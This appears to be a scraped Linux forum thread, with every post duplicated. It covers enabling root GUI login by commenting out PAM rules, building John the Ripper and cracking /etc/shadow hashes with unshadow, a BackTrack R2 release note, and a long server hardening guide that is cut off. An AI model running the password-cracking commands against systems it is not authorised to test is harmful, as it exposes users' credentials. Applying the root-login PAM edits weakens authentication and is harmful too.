sudo kwrite /etc/kde4/kdm/kdmrc
3) Search for Allow login to root
4) Change Value from false to true
5) Make a password for your root account
- sudo passwd root
6) Enter new password for root account and reboot your system to login as root.
To Enable Root account in Fedora / linux
1) Install any text editor (kwrite or gedit)
- su yum install nexteditorname
2) Write this command in terminal
- su -c vim /etc/pam.d/gdm ( One file open in text editor when you run this command and you have to make comment the below line by add # )
#auth required pm-suceed-if so !=root
- su -c vim /etc/pam.d/gdm-password ( One file open in text editor when you run this command and you have to make comment the below line by add # )
#auth required pm-suceed-if so !=root
3) Set password for root account and restart to login as root.
John the ripper
John the ripper
This is the method to install and use john the ripper in fedora..
1) Download john the ripper software
http://www.ziddu.com/download/6365223/jo...ar.gz.html
2) Extract it and then copy the text from
http://www.openwall.com/lists/john-users/2009/09/02/3
3) Save the copy text in john folder with john.patch.
4) Open terminal and go to john folder
cd Desktop/john-1.7.3.1
5) Now we have to patch our john software with following command
patch -Np1 -i john.patch
6) go to src folder
cd src
7) run this command
make linux-x86-sse2
8) cd .. and goto run folder cd run.
9) Run this commmand
./unshadow /etc/passwd /etc/shadow > filename
10) Finally run this command to crack password
./john filename
This is the method to install and use john the ripper in fedora..
1) Download john the ripper software
http://www.ziddu.com/download/6365223/jo...ar.gz.html
2) Extract it and then copy the text from
http://www.openwall.com/lists/john-users/2009/09/02/3
3) Save the copy text in john folder with john.patch.
4) Open terminal and go to john folder
cd Desktop/john-1.7.3.1
5) Now we have to patch our john software with following command
patch -Np1 -i john.patch
6) go to src folder
cd src
7) run this command
make linux-x86-sse2
8) cd .. and goto run folder cd run.
9) Run this commmand
./unshadow /etc/passwd /etc/shadow > filename
10) Finally run this command to crack password
./john filename
Bactrack R2 released
Bactrack R2 released
* Kernel 2.6.35.8 – *Much* improved mac80211 stack.
* USB 3.0 support.
* New wireless cards supported.
* All wireless Injection patches applied, maximum support for wireless attacks.
* Even *faster* desktop environment.
* Revamped Fluxbox environment for the KDE challenged.
* Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
* Updated old packages, added new ones, and removed obsolete ones.
* New BackTrack Wiki with better documentation and support.
* Our most professional, tested and streamlined release ever.
For those wanting to upgrade an older release of BT4, an apt-get update && apt-get dist-upgrade should do the job.
* Kernel 2.6.35.8 – *Much* improved mac80211 stack.
* USB 3.0 support.
* New wireless cards supported.
* All wireless Injection patches applied, maximum support for wireless attacks.
* Even *faster* desktop environment.
* Revamped Fluxbox environment for the KDE challenged.
* Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
* Updated old packages, added new ones, and removed obsolete ones.
* New BackTrack Wiki with better documentation and support.
* Our most professional, tested and streamlined release ever.
For those wanting to upgrade an older release of BT4, an apt-get update && apt-get dist-upgrade should do the job.
20 Linux Server Hardening Security Tips
20 Linux Server Hardening Security Tips
Securing your Linux server is important to protect your data, intellectual property, and time, from the hands of crackers (hackers). The system administrator is responsible for security Linux box. In this first part of a Linux server security series, I will provide 20 hardening tips for default installation of Linux system.
#1: Encrypt Data Communication
All data transmitted over a network is open to monitoring. Encrypt transmitted data whenever possible with password or using keys / certificates.
1. Use scp, ssh, rsync, or sftp for file transfer. You can also mount remote server file system or your own home directory using special sshfs and fuse tools.
2. GnuPG allows to encrypt and sign your data and communication, features a versatile key managment system as well as access modules for all kind of public key directories.
3. Fugu is a graphical frontend to the commandline Secure File Transfer application (SFTP). SFTP is similar to FTP, but unlike FTP, the entire session is encrypted, meaning no passwords are sent in cleartext form, and is thus much less vulnerable to third-party interception. Another option is FileZilla - a cross-platform client that supports FTP, FTP over SSL/TLS (FTPS), and SSH File Transfer Protocol (SFTP).
4. OpenVPN is a cost-effective, lightweight SSL VPN.
5. Lighttpd SSL (Secure Server Layer) Https Configuration And Installation
6. Apache SSL (Secure Server Layer) Https (mod_ssl) Configuration And Installation
#1.1: Avoid Using FTP, Telnet, And Rlogin / Rsh
Under most network configurations, user names, passwords, FTP / telnet / rsh commands and transferred files can be captured by anyone on the same network using a packet sniffer. The common solution to this problem is to use either OpenSSH , SFTP, or FTPS (FTP over SSL), which adds SSL or TLS encryption to FTP. Type the following command to delete NIS, rsh and other outdated service:
PHP Code:
# yum erase inetd xinetd ypserv tftp-server telnet-server rsh-serve
#2: Minimize Software to Minimize Vulnerability
Do you really need all sort of web services installed? Avoid installing unnecessary software to avoid vulnerabilities in software. Use the RPM package manager such as yum or apt-get and/or dpkg to review all installed set of software packages on a system. Delete all unwanted packages.
PHP Code:
# yum list installed
# yum list packageName
# yum remove packageName
OR
PHP Code:
# dpkg --list
# dpkg --info packageName
# apt-get remove packageName
#3: One Network Service Per System or VM Instance
Run different network services on separate servers or VM instance. This limits the number of other services that can be compromised. For example, if an attacker able to successfully exploit a software such as Apache flow, he / she will get an access to entire server including other services such as MySQL, e-mail server and so on. See how to install Virtualization software:
* Install and Setup XEN Virtualization Software on CentOS Linux 5
* How To Setup OpenVZ under RHEL / CentOS Linux
[b]#4: Keep Linux Kernel and Software Up to Date[/b]
Applying security patches is an important part of maintaining Linux server. Linux provides all necessary tools to keep your system updated, and also allows for easy upgrades between versions. All security update should be reviewed and applied as soon as possible. Again, use the RPM package manager such as yum and/or apt-get and/or dpkg to apply all security updates.
PHP Code:
# yum update
OR
PHP Code:
# apt-get update && apt-get upgrade
You can configure Red hat / CentOS / Fedora Linux to send yum package update notification via email. Another option is to apply all security updates via a cron job. Under Debian / Ubuntu Linux you can use apticron to send security notifications.
#5: Use Linux Security Extensions
Linux comes with various security patches which can be used to guard against misconfigured or compromised programs. If possible use SELinux and other Linux security extensions to enforce limitations on network and other programs. For example, SELinux provides a variety of security policies for Linux kernel.
#5.1: SELinux
I strongly recommend using SELinux which provides a flexible Mandatory Access Control (MAC). Under standard Linux Discretionary Access Control (DAC), an application or process running as a user (UID or SUID) has the user's permissions to objects such as files, sockets, and other processes. Running a MAC kernel protects the system from malicious or flawed applications that can damage or destroy the system. See the official Redhat documentation which explains SELinux configuration.
#6: User Accounts and Strong Password Policy
Use the useradd / usermod commands to create and maintain user accounts. Make sure you have a good and strong password policy. For example, a good password includes at least 8 characters long and mixture of alphabets, number, special character, upper & lower alphabets etc. Most important pick a password you can remember. Use tools such as "John the ripper" to find out weak users passwords on your server. Configure pam_cracklib.so to enforce the password policy.
#6.1: Password Aging
The chage command changes the number of days between password changes and the date of the last password change. This information is used by the system to determine when a user must change his/her password. The /etc/login.defs file defines the site-specific configuration for the shadow password suite including password aging configuration. To disable password aging, enter:
PHP Code:
chage -M 99999 userName
To get password expiration information, enter:
PHP Code:
chage -l userName
Finally, you can also edit the /etc/shadow file in the following fields:
PHP Code:
{userName}:{password}:{lastpasswdchanged}:{Minimum_days}:{Maximum_days}:{Warn}:{Inactive}:{Expire}:
Where,
1. Minimum_days: The minimum number of days required between password changes i.e. the number of days left before the user is allowed to change his/her password.
2. Maximum_days: The maximum number of days the password is valid (after that user is forced to change his/her password).
3. Warn : The number of days before password is to expire that user is warned that his/her password must be changed.
4. Expire : Days since Jan 1, 1970 that account is disabled i.e. an absolute date specifying when the login may no longer be used.
I recommend chage command instead of editing the /etc/shadow by hand:
PHP Code:
# chage -M 60 -m 7 -W 7 userName
#6.2: Restricting Use of Previous Passwords
You can prevent all users from using or reuse same old passwords under Linux. The pam_unix module parameter remember can be used to configure the number of previous passwords that cannot be reused.
#6.3: Locking User Accounts After Login Failures
Under Linux you can use the faillog command to display faillog records or to set login failure limits. faillog formats the contents of the failure log from /var/log/faillog database / log file. It also can be used for maintains failure counters and limits.To see failed login attempts, enter:
faillog
To unlock an account after login failures, run:
PHP Code:
faillog -r -u userName
Note you can use passwd command to lock and unlock accounts:
# lock account
PHP Code:
passwd -l userName
# unlocak account
PHP Code:
passwd -u userName
#6.4: How Do I Verify No Accounts Have Empty Passwords?
Type the following command
PHP Code:
# awk -F: '($2 == "") {print}' /etc/shadow
Lock all empty password accounts:
# passwd -l accountName
#6.5: Make Sure No Non-Root Accounts Have UID Set To 0
Only root account have UID 0 with full permissions to access the system. Type the following command to display all accounts with UID set to 0:
PHP Code:
# awk -F: '($3 == "0") {print}' /etc/passwd
You should only see one line as follows:
PHP Code:
root:x:0:0:root:/root:/bin/bash
If you see other lines, delete them or make sure other accounts are authorized by you to use UID 0.
#7: Disable root Login
Never ever login as root user. You should use sudo to execute root level commands as and when required. sudo does greatly enhances the security of the system without sharing root password with other users and admins. sudo provides simple auditing and tracking features too.
#8: Physical Server Security
You must protect Linux servers physical console access. Configure the BIOS and disable the booting from external devices such as DVDs / CDs / USB pen. Set BIOS and grub boot loader password to protect these settings. All production boxes must be locked in IDCs (Internet Data Center) and all persons must pass some sort of security checks before accessing your server. See also:
* 9 Tips To Protect Linux Servers Physical Console Access.
#9: Disable Unwanted Services
Disable all unnecessary services and daemons (services that runs in the background). You need to remove all unwanted services from the system start-up. Type the following command to list all services which are started at boot time in run level # 3:
PHP Code:
# chkconfig --list | grep '3:on'
To disable service, enter:
PHP Code:
# service serviceName stop
# chkconfig serviceName off
#9.1: Find Listening Network Ports
Use the following command to list all open ports and associated programs:
PHP Code:
netstat -tulpn
OR
PHP Code:
nmap -sT -O localhost
nmap -sT -O server.example.com
Use iptables to close open ports or stop all unwanted network services using above service and chkconfig commands.
#10: Delete X Windows
X Windows on server is not required. There is no reason to run X Windows on your dedicated mail and Apache web server. You can disable and remove X Windows to improve server security and performance. Edit /etc/inittab and set run level to 3. Finally, remove X Windows system, enter:
PHP Code:
# yum groupremove "X Window System"
#11: Configure Iptables and TCPWrappers
Iptables is a user space application program that allows you to configure the firewall (Netfilter) provided by the Linux kernel. Use firewall to filter out traffic and allow only necessary traffic. Also use the TCPWrappers a host-based networking ACL system to filter network access to Internet. You can prevent many denial of service attacks with the help of Iptables:
* Lighttpd Traffic Shaping: Throttle Connections Per Single IP (Rate Limit).
* How to: Linux Iptables block common attack.
* psad: Linux Detect And Block Port Scan Attacks In Real Time.
#12: Linux Kernel /etc/sysctl.conf Hardening
/etc/sysctl.conf file is used to configure kernel parameters at runtime. Linux reads and applies settings from /etc/sysctl.conf at boot time.
Sample /etc/sysctl.conf:
PHP Code:
# Turn on execshield
kernel.exec-shield=1
kernel.randomize_va_space=1
# Enable IP spoofing protection
net.ipv4.conf.all.rp_filter=1
# Disable IP source routing
net.ipv4.conf.all.accept_source_route=0
# Ignoring broadcasts request
net.ipv4.icmp_echo_ignore_broadcasts=1
net.ipv4.icmp_ignore_bogus_error_messages=1
# Make sure spoofed packets get logged
net.ipv4.conf.all.log_martians = 1
#13: Separate Disk Partitions
Separation of the operating system files from user files may result into a better and secure system. Make sure the following filesystems are mounted on separate partitions:
* /usr
* /home
* /var and /var/tmp
* /tmp
Create septate partitions for Apache and FTP server roots. Edit /etc/fstab file and make sure you add the following configuration options:
1. noexec - Do not set execution of any binaries on this partition (prevents execution of binaries but allows scripts).
2. nodev - Do not allow character or special devices on this partition (prevents use of device files such as zero, sda etc).
3. nosuid - Do not set SUID/SGID access on this partition (prevent the setuid bit).
Sample /etc/fstab entry to to limit user access on /dev/sda5 (ftp server root directory):
/dev/sda5 /ftpdata ext3 defaults,nosuid,nodev,noexec 1 2
#13.1: Disk Quotas
Make sure disk quota is enabled for all users. To implement disk quotas, use the following steps:
1. Enable quotas per file system by modifying the /etc/fstab file.
2. Remount the file system(s).
3. Create the quota database files and generate the disk usage table.
4. Assign quota policies.
5. See implementing disk quotas tutorial for further details.
#14: Turn Off IPv6
Internet Protocol version 6 (IPv6) provides a new Internet layer of the TCP/IP protocol suite that replaces Internet Protocol version 4 (IPv4) and provides many benefits. Currently there are no good tools out which are able to check a system over network for IPv6 security issues. Most Linux distro began enabling IPv6 protocol by default. Crackers can send bad traffic via IPv6 as most admins are not monitoring it. Unless network configuration requires it, disable IPv6 or configure Linux IPv6 firewall:
#15: Disable Unwanted SUID and SGID Binaries
All SUID/SGID bits enabled file can be misused when the SUID/SGID executable has a security problem or bug. All local or remote user can use such file. It is a good idea to find all such files. Use the find command as follows:
#See all set user id files:
PHP Code:
find / -perm +4000
# See all group id files
PHP Code:
find / -perm +2000
# Or combine both in a single command
PHP Code:
find / ( -perm -4000 -o -perm -2000 ) -print
find / -path -prune -o -type f -perm +6000 -ls
You need to investigate each reported file. See reported file man page for further details.
#15.1: World-Writable Files
Anyone can modify world-writable file resulting into a security issue. Use the following command to find all world writable and sticky bits set files:
find /dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
You need to investigate each reported file and either set correct user and group permission or remove it.
#15.2: Noowner Files
Files not owned by any user or group can pose a security problem. Just find them with the following command which do not belong to a valid user and a valid group
find /dir -xdev \( -nouser -o -nogroup \) -print
You need to investigate each reported file and either assign it to an appropriate user and group or remove it.
#16: Use A Centralized Authentication Service
Without a centralized authentication system, user auth data becomes inconsistent, which may lead into out-of-date credentials and forgotten accounts which should have been deleted in first place. A centralized authentication service allows you maintaining central control over Linux / UNIX account and authentication data. You can keep auth data synchronized between servers. Do not use the NIS service for centralized authentication. Use OpenLDAP for clients and servers.
#16.1: Kerberos
Kerberos performs authentication as a trusted third party authentication service by using cryptographic shared secret under the assumption that packets traveling along the insecure network can be read, modified, and inserted. Kerberos builds on symmetric-key cryptography and requires a key distribution center. You can make remote login, remote copy, secure inter-system file copying and other high-risk tasks safer and more controllable using Kerberos. So, when users authenticate to network services using Kerberos, unauthorized users attempting to gather passwords by monitoring network traffic are effectively thwarted. See how to setup and use Kerberos.
#17: Logging and Auditing
You need to configure logging and auditing to collect all hacking and cracking attempts. By default syslog stores data in /var/log/ directory. This is also useful to find out software misconfiguration which may open your system to various attacks.
#17.1: Monitor Suspicious Log Messages With Logwatch / Logcheck
Read your logs using logwatch or logcheck. These tools make your log reading life easier. You get detailed reporting on unusual items in syslog via email. A sample syslog report:
PHP Code:
################### Logwatch 7.3 (03/24/06) ####################
Processing Initiated: Fri Oct 30 04:02:03 2009
Date Range Processed: yesterday
( 2009-Oct-29 )
Period is day.
Detail Level of Output: 0
Type of Output: unformatted
Logfiles for Host: www-52.nixcraft.net.in
##################################################################
--------------------- Named Begin ------------------------
**Unmatched Entries**
general: info: zone XXXXXX.com/IN: Transfer started.: 3 Time(s)
general: info: zone XXXXXX.com/IN: refresh: retry limit for master ttttttttttttttttttt#53 exceeded (source ::#0): 3 Time(s)
general: info: zone XXXXXX.com/IN: Transfer started.: 4 Time(s)
general: info: zone XXXXXX.com/IN: refresh: retry limit for master ttttttttttttttttttt#53 exceeded (source ::#0): 4 Time(s)
---------------------- Named End -------------------------
--------------------- iptables firewall Begin ------------------------
Logged 87 packets on interface eth0
From 58.y.xxx.ww - 1 packet to tcp(8080)
From 59.www.zzz.yyy - 1 packet to tcp(22)
From 60.32.nnn.yyy - 2 packets to tcp(45633)
From 222.xxx.ttt.zz - 5 packets to tcp(8000,8080,8800)
---------------------- iptables firewall End -------------------------
--------------------- SSHD Begin ------------------------
Users logging in through sshd:
root:
123.xxx.ttt.zzz: 6 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 450G 185G 241G 44% /
/dev/sda1 99M 35M 60M 37% /boot
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
(Note output is truncated)
#17.2: System Accounting with auditd
The auditd is provided for system auditing. It is responsible for writing audit records to the disk. During startup, the rules in /etc/audit.rules are read by this daemon. You can open /etc/audit.rules file and make changes such as setup audit file log location and other option. With auditd you can answers the following questions:
1. System startup and shutdown events (reboot / halt).
2. Date and time of the event.
3. User respoisble for the event (such as trying to access /path/to/topsecret.dat file).
4. Type of event (edit, access, delete, write, update file & commands).
5. Success or failure of the event.
6. Records events that Modify date and time.
7. Find out who made changes to modify the system's network settings.
8. Record events that modify user/group information.
9. See who made changes to a file etc.
See our quick tutorial which explains enabling and using the auditd service.
#18: Secure OpenSSH Server
The SSH protocol is recommended for remote login and remote file transfer. However, ssh is open to many attacks. See how to secure OpenSSH server:
* Top 20 OpenSSH Server Best Security Practices.
#19: Install And Use Intrusion Detection System
A network intrusion detection system (NIDS) is an intrusion detection system that tries to detect malicious activity such as denial of service attacks, port scans or even attempts to crack into computers by monitoring network traffic.
It is a good practice to deploy any integrity checking software before system goes online in a production environment. If possible install AIDE software before the system is connected to any network. AIDE is a host-based intrusion detection system (HIDS) it can monitor and analyses the internals of a computing system.
Snort is a software for intrusion detection which is capable of performing packet logging and real-time traffic analysis on IP networks.
#20: Protecting Files, Directories and Email
Linux offers excellent protections against unauthorized data access. File permissions and MAC prevent unauthorized access from accessing data. However, permissions set by the Linux are irrelevant if an attacker has physical access to a computer and can simply move the computer's hard drive to another system to copy and analyze the sensitive data. You can easily protect files, and partitons under Linux using the following tools:
* To encrypt and decrypt files with a password, use gpg command.
* Linux or UNIX password protect files with openssl and other tools.
* See how to encrypting directories with ecryptfs.
* TrueCrypt is free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X and Linux.
* Howto: Disk and partition encryption in Linux for mobile devices.
* How to setup encrypted Swap on Linux.
#20.1: Securing Email Servers
You can use SSL certificates and gpg keys to secure email communication on both server and client computers:
"I want to change the world, but nobody gives me the source code"
Securing your Linux server is important to protect your data, intellectual property, and time, from the hands of crackers (hackers). The system administrator is responsible for security Linux box. In this first part of a Linux server security series, I will provide 20 hardening tips for default installation of Linux system.
#1: Encrypt Data Communication
All data transmitted over a network is open to monitoring. Encrypt transmitted data whenever possible with password or using keys / certificates.
1. Use scp, ssh, rsync, or sftp for file transfer. You can also mount remote server file system or your own home directory using special sshfs and fuse tools.
2. GnuPG allows to encrypt and sign your data and communication, features a versatile key managment system as well as access modules for all kind of public key directories.
3. Fugu is a graphical frontend to the commandline Secure File Transfer application (SFTP). SFTP is similar to FTP, but unlike FTP, the entire session is encrypted, meaning no passwords are sent in cleartext form, and is thus much less vulnerable to third-party interception. Another option is FileZilla - a cross-platform client that supports FTP, FTP over SSL/TLS (FTPS), and SSH File Transfer Protocol (SFTP).
4. OpenVPN is a cost-effective, lightweight SSL VPN.
5. Lighttpd SSL (Secure Server Layer) Https Configuration And Installation
6. Apache SSL (Secure Server Layer) Https (mod_ssl) Configuration And Installation
#1.1: Avoid Using FTP, Telnet, And Rlogin / Rsh
Under most network configurations, user names, passwords, FTP / telnet / rsh commands and transferred files can be captured by anyone on the same network using a packet sniffer. The common solution to this problem is to use either OpenSSH , SFTP, or FTPS (FTP over SSL), which adds SSL or TLS encryption to FTP. Type the following command to delete NIS, rsh and other outdated service:
PHP Code:
# yum erase inetd xinetd ypserv tftp-server telnet-server rsh-serve
#2: Minimize Software to Minimize Vulnerability
Do you really need all sort of web services installed? Avoid installing unnecessary software to avoid vulnerabilities in software. Use the RPM package manager such as yum or apt-get and/or dpkg to review all installed set of software packages on a system. Delete all unwanted packages.
PHP Code:
# yum list installed
# yum list packageName
# yum remove packageName
OR
PHP Code:
# dpkg --list
# dpkg --info packageName
# apt-get remove packageName
#3: One Network Service Per System or VM Instance
Run different network services on separate servers or VM instance. This limits the number of other services that can be compromised. For example, if an attacker able to successfully exploit a software such as Apache flow, he / she will get an access to entire server including other services such as MySQL, e-mail server and so on. See how to install Virtualization software:
* Install and Setup XEN Virtualization Software on CentOS Linux 5
* How To Setup OpenVZ under RHEL / CentOS Linux
[b]#4: Keep Linux Kernel and Software Up to Date[/b]
Applying security patches is an important part of maintaining Linux server. Linux provides all necessary tools to keep your system updated, and also allows for easy upgrades between versions. All security update should be reviewed and applied as soon as possible. Again, use the RPM package manager such as yum and/or apt-get and/or dpkg to apply all security updates.
PHP Code:
# yum update
OR
PHP Code:
# apt-get update && apt-get upgrade
You can configure Red hat / CentOS / Fedora Linux to send yum package update notification via email. Another option is to apply all security updates via a cron job. Under Debian / Ubuntu Linux you can use apticron to send security notifications.
#5: Use Linux Security Extensions
Linux comes with various security patches which can be used to guard against misconfigured or compromised programs. If possible use SELinux and other Linux security extensions to enforce limitations on network and other programs. For example, SELinux provides a variety of security policies for Linux kernel.
#5.1: SELinux
I strongly recommend using SELinux which provides a flexible Mandatory Access Control (MAC). Under standard Linux Discretionary Access Control (DAC), an application or process running as a user (UID or SUID) has the user's permissions to objects such as files, sockets, and other processes. Running a MAC kernel protects the system from malicious or flawed applications that can damage or destroy the system. See the official Redhat documentation which explains SELinux configuration.
#6: User Accounts and Strong Password Policy
Use the useradd / usermod commands to create and maintain user accounts. Make sure you have a good and strong password policy. For example, a good password includes at least 8 characters long and mixture of alphabets, number, special character, upper & lower alphabets etc. Most important pick a password you can remember. Use tools such as "John the ripper" to find out weak users passwords on your server. Configure pam_cracklib.so to enforce the password policy.
#6.1: Password Aging
The chage command changes the number of days between password changes and the date of the last password change. This information is used by the system to determine when a user must change his/her password. The /etc/login.defs file defines the site-specific configuration for the shadow password suite including password aging configuration. To disable password aging, enter:
PHP Code:
chage -M 99999 userName
To get password expiration information, enter:
PHP Code:
chage -l userName
Finally, you can also edit the /etc/shadow file in the following fields:
PHP Code:
{userName}:{password}:{lastpasswdchanged}:{Minimum_days}:{Maximum_days}:{Warn}:{Inactive}:{Expire}:
Where,
1. Minimum_days: The minimum number of days required between password changes i.e. the number of days left before the user is allowed to change his/her password.
2. Maximum_days: The maximum number of days the password is valid (after that user is forced to change his/her password).
3. Warn : The number of days before password is to expire that user is warned that his/her password must be changed.
4. Expire : Days since Jan 1, 1970 that account is disabled i.e. an absolute date specifying when the login may no longer be used.
I recommend chage command instead of editing the /etc/shadow by hand:
PHP Code:
# chage -M 60 -m 7 -W 7 userName
#6.2: Restricting Use of Previous Passwords
You can prevent all users from using or reuse same old passwords under Linux. The pam_unix module parameter remember can be used to configure the number of previous passwords that cannot be reused.
#6.3: Locking User Accounts After Login Failures
Under Linux you can use the faillog command to display faillog records or to set login failure limits. faillog formats the contents of the failure log from /var/log/faillog database / log file. It also can be used for maintains failure counters and limits.To see failed login attempts, enter:
faillog
To unlock an account after login failures, run:
PHP Code:
faillog -r -u userName
Note you can use passwd command to lock and unlock accounts:
# lock account
PHP Code:
passwd -l userName
# unlocak account
PHP Code:
passwd -u userName
#6.4: How Do I Verify No Accounts Have Empty Passwords?
Type the following command
PHP Code:
# awk -F: '($2 == "") {print}' /etc/shadow
Lock all empty password accounts:
# passwd -l accountName
#6.5: Make Sure No Non-Root Accounts Have UID Set To 0
Only root account have UID 0 with full permissions to access the system. Type the following command to display all accounts with UID set to 0:
PHP Code:
# awk -F: '($3 == "0") {print}' /etc/passwd
You should only see one line as follows:
PHP Code:
root:x:0:0:root:/root:/bin/bash
If you see other lines, delete them or make sure other accounts are authorized by you to use UID 0.
#7: Disable root Login
Never ever login as root user. You should use sudo to execute root level commands as and when required. sudo does greatly enhances the security of the system without sharing root password with other users and admins. sudo provides simple auditing and tracking features too.
#8: Physical Server Security
You must protect Linux servers physical console access. Configure the BIOS and disable the booting from external devices such as DVDs / CDs / USB pen. Set BIOS and grub boot loader password to protect these settings. All production boxes must be locked in IDCs (Internet Data Center) and all persons must pass some sort of security checks before accessing your server. See also:
* 9 Tips To Protect Linux Servers Physical Console Access.
#9: Disable Unwanted Services
Disable all unnecessary services and daemons (services that runs in the background). You need to remove all unwanted services from the system start-up. Type the following command to list all services which are started at boot time in run level # 3:
PHP Code:
# chkconfig --list | grep '3:on'
To disable service, enter:
PHP Code:
# service serviceName stop
# chkconfig serviceName off
#9.1: Find Listening Network Ports
Use the following command to list all open ports and associated programs:
PHP Code:
netstat -tulpn
OR
PHP Code:
nmap -sT -O localhost
nmap -sT -O server.example.com
Use iptables to close open ports or stop all unwanted network services using above service and chkconfig commands.
#10: Delete X Windows
X Windows on server is not required. There is no reason to run X Windows on your dedicated mail and Apache web server. You can disable and remove X Windows to improve server security and performance. Edit /etc/inittab and set run level to 3. Finally, remove X Windows system, enter:
PHP Code:
# yum groupremove "X Window System"
#11: Configure Iptables and TCPWrappers
Iptables is a user space application program that allows you to configure the firewall (Netfilter) provided by the Linux kernel. Use firewall to filter out traffic and allow only necessary traffic. Also use the TCPWrappers a host-based networking ACL system to filter network access to Internet. You can prevent many denial of service attacks with the help of Iptables:
* Lighttpd Traffic Shaping: Throttle Connections Per Single IP (Rate Limit).
* How to: Linux Iptables block common attack.
* psad: Linux Detect And Block Port Scan Attacks In Real Time.
#12: Linux Kernel /etc/sysctl.conf Hardening
/etc/sysctl.conf file is used to configure kernel parameters at runtime. Linux reads and applies settings from /etc/sysctl.conf at boot time.
Sample /etc/sysctl.conf:
PHP Code:
# Turn on execshield
kernel.exec-shield=1
kernel.randomize_va_space=1
# Enable IP spoofing protection
net.ipv4.conf.all.rp_filter=1
# Disable IP source routing
net.ipv4.conf.all.accept_source_route=0
# Ignoring broadcasts request
net.ipv4.icmp_echo_ignore_broadcasts=1
net.ipv4.icmp_ignore_bogus_error_messages=1
# Make sure spoofed packets get logged
net.ipv4.conf.all.log_martians = 1
#13: Separate Disk Partitions
Separation of the operating system files from user files may result into a better and secure system. Make sure the following filesystems are mounted on separate partitions:
* /usr
* /home
* /var and /var/tmp
* /tmp
Create septate partitions for Apache and FTP server roots. Edit /etc/fstab file and make sure you add the following configuration options:
1. noexec - Do not set execution of any binaries on this partition (prevents execution of binaries but allows scripts).
2. nodev - Do not allow character or special devices on this partition (prevents use of device files such as zero, sda etc).
3. nosuid - Do not set SUID/SGID access on this partition (prevent the setuid bit).
Sample /etc/fstab entry to to limit user access on /dev/sda5 (ftp server root directory):
/dev/sda5 /ftpdata ext3 defaults,nosuid,nodev,noexec 1 2
#13.1: Disk Quotas
Make sure disk quota is enabled for all users. To implement disk quotas, use the following steps:
1. Enable quotas per file system by modifying the /etc/fstab file.
2. Remount the file system(s).
3. Create the quota database files and generate the disk usage table.
4. Assign quota policies.
5. See implementing disk quotas tutorial for further details.
#14: Turn Off IPv6
Internet Protocol version 6 (IPv6) provides a new Internet layer of the TCP/IP protocol suite that replaces Internet Protocol version 4 (IPv4) and provides many benefits. Currently there are no good tools out which are able to check a system over network for IPv6 security issues. Most Linux distro began enabling IPv6 protocol by default. Crackers can send bad traffic via IPv6 as most admins are not monitoring it. Unless network configuration requires it, disable IPv6 or configure Linux IPv6 firewall:
#15: Disable Unwanted SUID and SGID Binaries
All SUID/SGID bits enabled file can be misused when the SUID/SGID executable has a security problem or bug. All local or remote user can use such file. It is a good idea to find all such files. Use the find command as follows:
#See all set user id files:
PHP Code:
find / -perm +4000
# See all group id files
PHP Code:
find / -perm +2000
# Or combine both in a single command
PHP Code:
find / ( -perm -4000 -o -perm -2000 ) -print
find / -path -prune -o -type f -perm +6000 -ls
You need to investigate each reported file. See reported file man page for further details.
#15.1: World-Writable Files
Anyone can modify world-writable file resulting into a security issue. Use the following command to find all world writable and sticky bits set files:
find /dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
You need to investigate each reported file and either set correct user and group permission or remove it.
#15.2: Noowner Files
Files not owned by any user or group can pose a security problem. Just find them with the following command which do not belong to a valid user and a valid group
find /dir -xdev \( -nouser -o -nogroup \) -print
You need to investigate each reported file and either assign it to an appropriate user and group or remove it.
#16: Use A Centralized Authentication Service
Without a centralized authentication system, user auth data becomes inconsistent, which may lead into out-of-date credentials and forgotten accounts which should have been deleted in first place. A centralized authentication service allows you maintaining central control over Linux / UNIX account and authentication data. You can keep auth data synchronized between servers. Do not use the NIS service for centralized authentication. Use OpenLDAP for clients and servers.
#16.1: Kerberos
Kerberos performs authentication as a trusted third party authentication service by using cryptographic shared secret under the assumption that packets traveling along the insecure network can be read, modified, and inserted. Kerberos builds on symmetric-key cryptography and requires a key distribution center. You can make remote login, remote copy, secure inter-system file copying and other high-risk tasks safer and more controllable using Kerberos. So, when users authenticate to network services using Kerberos, unauthorized users attempting to gather passwords by monitoring network traffic are effectively thwarted. See how to setup and use Kerberos.
#17: Logging and Auditing
You need to configure logging and auditing to collect all hacking and cracking attempts. By default syslog stores data in /var/log/ directory. This is also useful to find out software misconfiguration which may open your system to various attacks.
#17.1: Monitor Suspicious Log Messages With Logwatch / Logcheck
Read your logs using logwatch or logcheck. These tools make your log reading life easier. You get detailed reporting on unusual items in syslog via email. A sample syslog report:
PHP Code:
################### Logwatch 7.3 (03/24/06) ####################
Processing Initiated: Fri Oct 30 04:02:03 2009
Date Range Processed: yesterday
( 2009-Oct-29 )
Period is day.
Detail Level of Output: 0
Type of Output: unformatted
Logfiles for Host: www-52.nixcraft.net.in
##################################################################
--------------------- Named Begin ------------------------
**Unmatched Entries**
general: info: zone XXXXXX.com/IN: Transfer started.: 3 Time(s)
general: info: zone XXXXXX.com/IN: refresh: retry limit for master ttttttttttttttttttt#53 exceeded (source ::#0): 3 Time(s)
general: info: zone XXXXXX.com/IN: Transfer started.: 4 Time(s)
general: info: zone XXXXXX.com/IN: refresh: retry limit for master ttttttttttttttttttt#53 exceeded (source ::#0): 4 Time(s)
---------------------- Named End -------------------------
--------------------- iptables firewall Begin ------------------------
Logged 87 packets on interface eth0
From 58.y.xxx.ww - 1 packet to tcp(8080)
From 59.www.zzz.yyy - 1 packet to tcp(22)
From 60.32.nnn.yyy - 2 packets to tcp(45633)
From 222.xxx.ttt.zz - 5 packets to tcp(8000,8080,8800)
---------------------- iptables firewall End -------------------------
--------------------- SSHD Begin ------------------------
Users logging in through sshd:
root:
123.xxx.ttt.zzz: 6 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/sda3 450G 185G 241G 44% /
/dev/sda1 99M 35M 60M 37% /boot
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
(Note output is truncated)
#17.2: System Accounting with auditd
The auditd is provided for system auditing. It is responsible for writing audit records to the disk. During startup, the rules in /etc/audit.rules are read by this daemon. You can open /etc/audit.rules file and make changes such as setup audit file log location and other option. With auditd you can answers the following questions:
